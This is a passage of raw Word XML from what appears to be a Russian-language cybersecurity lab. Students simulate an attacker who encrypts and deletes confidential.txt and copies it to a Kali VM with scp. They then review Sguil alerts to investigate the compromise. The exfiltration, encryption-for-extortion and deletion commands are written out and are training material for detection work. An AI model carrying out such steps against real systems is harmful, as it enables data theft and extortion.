      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kbytes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7D4F01" w14:textId="333E69A2" w:rsidR="00266168" w:rsidRDefault="00266168" w:rsidP="00F564ED">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Введите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">quit </w:t>
      </w:r>
      <w:r>
        <w:t>по завершении передачи файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67423E" w14:textId="3636EA14" w:rsidR="0073224A" w:rsidRDefault="0073224A" w:rsidP="0073224A">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Зашифруйте данные</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>удалите исходник.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B501F" w14:textId="7DBAC200" w:rsidR="006513FD" w:rsidRDefault="0073224A" w:rsidP="00F564ED">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Хакеры часто будут зашифровывать конфиденциальные данные</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>сохранять их локально, например для шантажа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>вымогательства</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">будущем. Заархивируйте файл </w:t>
      </w:r>
      <w:r w:rsidR="006513FD" w:rsidRPr="0073224A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>confidential.txt</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>зашифруйте его.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">качестве пароля введите </w:t>
      </w:r>
      <w:r w:rsidR="006513FD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C71169D" w14:textId="1A984765" w:rsidR="006513FD" w:rsidRPr="008855F4" w:rsidRDefault="006513FD" w:rsidP="00A23D59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analyst@secOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lab.support</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]$</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> zip -e confidential.zip confidential.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797D6265" w14:textId="77777777" w:rsidR="006513FD" w:rsidRPr="008855F4" w:rsidRDefault="006513FD" w:rsidP="00A23D59">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A34A2F8" w14:textId="52939755" w:rsidR="00B5554B" w:rsidRPr="008855F4" w:rsidRDefault="006513FD" w:rsidP="00B5554B">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Verify password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0DA9F" w14:textId="59EE38FE" w:rsidR="006513FD" w:rsidRPr="008855F4" w:rsidRDefault="006513FD" w:rsidP="00A23D59">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> adding: confidential.txt (deflated 4%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F360EC2" w14:textId="22C8BB5A" w:rsidR="00A23D59" w:rsidRPr="008855F4" w:rsidRDefault="0073224A" w:rsidP="009B6BFC">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Удалите</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файл</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A23D59" w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>confidential.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>из</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальной</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>машины</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CyberOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Workstation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7060B6F3" w14:textId="28B093A1" w:rsidR="00A23D59" w:rsidRPr="008855F4" w:rsidRDefault="00A23D59" w:rsidP="00A23D59">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst@secOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lab.support</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">]$ </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rm confidential.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4AACA2" w14:textId="0B18230D" w:rsidR="006513FD" w:rsidRDefault="006513FD" w:rsidP="009B6BFC">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Введите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> три раза, пока не перейдете обратно</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>командную строку root@kali:~#.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5697CE01" w14:textId="3F90D6B6" w:rsidR="00346A7E" w:rsidRDefault="006513FD" w:rsidP="009B6BFC">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Теперь хакер может скопировать файл из FTP на виртуальной машине Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">виртуальную машину Kali. Этот процесс может занять некоторое время. При появлении соответствующего запроса введите пароль </w:t>
      </w:r>
      <w:r w:rsidR="00C91021">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0A9BAD" w14:textId="77777777" w:rsidR="00EA4873" w:rsidRPr="008855F4" w:rsidRDefault="00EA4873" w:rsidP="00EA4873">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> analyst@209.165.200.235:/home/analyst/confidential.txt ~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0304C0" w14:textId="77777777" w:rsidR="00EA4873" w:rsidRPr="008855F4" w:rsidRDefault="00EA4873" w:rsidP="00C91021">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst@209.165.200.235's password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F2338" w14:textId="44ED8709" w:rsidR="003C1D77" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="00C91021">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:rPr>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>confidential.txt  100%  102   102.1KB/s   00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB91926" w14:textId="06BD4FF0" w:rsidR="006A7E58" w:rsidRDefault="006A7E58" w:rsidP="00462C07">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r>
        <w:t>. Можно скопировать данный файл непосредственно из виртуальной машины CyberOps Workstation</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальную машину Kali при наличии на ней учетной записи пользователя, которая отличается от настроенной учетной записи</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root. Поскольку FTP передает содержимое</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>виде обычного текста, вы сможете просмотреть содержимое пакетов</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>помощью программы Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5F2A14" w14:textId="0003FDD0" w:rsidR="0063008A" w:rsidRDefault="0063008A" w:rsidP="00BA3E43">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>При необходимости можно снова войти на Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>удалить файл confidential.txt на сервере FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5940C4CA" w14:textId="5D3878A4" w:rsidR="0063008A" w:rsidRPr="008855F4" w:rsidRDefault="0063008A" w:rsidP="00BA3E43">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:keepNext/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> analyst@209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2855C636" w14:textId="65597F10" w:rsidR="0063008A" w:rsidRPr="008855F4" w:rsidRDefault="0063008A" w:rsidP="00BA3E43">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
        <w:keepNext/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyst@209.165.200.235's password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573A2E18" w14:textId="6950BBC8" w:rsidR="0063008A" w:rsidRPr="00DB6F26" w:rsidRDefault="0063008A" w:rsidP="0063008A">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">analyst@metasploitable:~$ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>rm confidential.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688FBB30" w14:textId="36C45ED3" w:rsidR="00BA3E43" w:rsidRDefault="00A26E11" w:rsidP="00875021">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Теперь можно завершить работу на ВМ Metasploitable, ВМ CyberOps Workstation</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ВМ Kali. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26768A6A" w14:textId="0EEC46DB" w:rsidR="00A232DE" w:rsidRPr="00315F42" w:rsidRDefault="00A232DE" w:rsidP="00875021">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r w:rsidRPr="00A232DE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1966F13D" wp14:editId="67B52730">
            <wp:extent cx="6400800" cy="24250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6F39" w14:textId="60191599" w:rsidR="00346967" w:rsidRDefault="00E671C6" w:rsidP="00EE2B0C">
      <w:pPr>
        <w:pStyle w:val="PartHead"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Просмотр журналов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DCB021" w14:textId="380BA222" w:rsidR="00E671C6" w:rsidRDefault="00A26E11" w:rsidP="00E671C6">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>После атаки</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> у </w:t>
      </w:r>
      <w:r>
        <w:t>пользователя analyst больше нет доступа</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>файлу</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>именем</w:t>
      </w:r>
      <w:r w:rsidRPr="0073224A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> confidential.txt</w:t>
      </w:r>
      <w:r>
        <w:t>. Теперь вы сможете посмотреть журналы, чтобы определить, каким образом был скомпрометирован файл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3A6AB1" w14:textId="59A31251" w:rsidR="002E33C0" w:rsidRDefault="002E33C0" w:rsidP="00E671C6">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r>
        <w:t>. Если бы это была производственная сеть, то желательно, чтобы пользователи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> analyst</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="007F1018">
        <w:t xml:space="preserve"> изменили свои пароли, чтобы выполнить требования текущей политики безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B905741" w14:textId="4B109836" w:rsidR="00AA5D99" w:rsidRDefault="00AA5D99" w:rsidP="00AA5D99">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Просмотрите оповещения</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>Sguil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545C2C6" w14:textId="3311BA7D" w:rsidR="00D966DD" w:rsidRDefault="00D27327" w:rsidP="00D27327">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Откройте виртуальную машину Security Onion. При необходимости войдите</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">систему под именем пользователя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>analyst</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">паролем </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27327">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cyberops</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC129F" w14:textId="02DC81A2" w:rsidR="009B6BFC" w:rsidRDefault="00AC28E1" w:rsidP="00D27327">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Откройте </w:t>
      </w:r>
      <w:r w:rsidRPr="00D73200">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sguil</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">выполните вход. Щелкните </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Select All (Выбрать все)</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>запустите SGUIL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEBB421" w14:textId="6793929E" w:rsidR="00A91F6F" w:rsidRDefault="00DA520D" w:rsidP="00000B53">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Hlk487532164"/>
      <w:r>
        <w:t>Просмотрите события</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>списке столбца сообщений</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> о </w:t>
      </w:r>
      <w:r>
        <w:t>событии. Там</w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>есть</w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>два</w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>сообщения</w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GPL ATTACK_RESPONSE id check returned root</w:t>
      </w:r>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Эти сообщения указывают, что во время атаки мог быть предоставлен доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>правами root. Узел 209.165.200.235 по запросу предоставил доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">правами root узлу 209.165.201.17. Установите флажок </w:t>
      </w:r>
      <w:r w:rsidR="00D73200">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Show Packet Data (Показать пакетные данные)</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D73200">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Show Rule (Показать правило) </w:t>
      </w:r>
      <w:r>
        <w:t>для подробного просмотра каждого оповещения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6362AF" w14:textId="5705D50F" w:rsidR="00F57911" w:rsidRPr="00F57911" w:rsidRDefault="00F57911" w:rsidP="00F57911">
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr>
          <w:rStyle w:val="ad"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57911">
        <w:rPr>
          <w:rStyle w:val="ad"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CB7712" wp14:editId="58019845">
            <wp:extent cx="2286000" cy="791029"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot of Sguil console with Show Packet Data and Show Rule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2D43" w14:textId="0A8A3C01" w:rsidR="002519B2" w:rsidRDefault="00A44EA1" w:rsidP="00000B53">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Выберите возвращенное сообщение root, которое связано</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">датчиком </w:t>
      </w:r>
      <w:r w:rsidR="00D73200" w:rsidRPr="0073224A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>seconion-eth1-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, чтобы проанализировать его подробнее. На рисунке ниже показано оповещение </w:t>
      </w:r>
      <w:r w:rsidR="007F104C" w:rsidRPr="0073224A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Alert ID 5.2568</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>связанные</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ним события. Однако ваш </w:t>
      </w:r>
      <w:r w:rsidR="0073224A" w:rsidRPr="0073224A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>идентификатор оповещения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> может отличаться.</w:t>
      </w:r>
    </w:p>
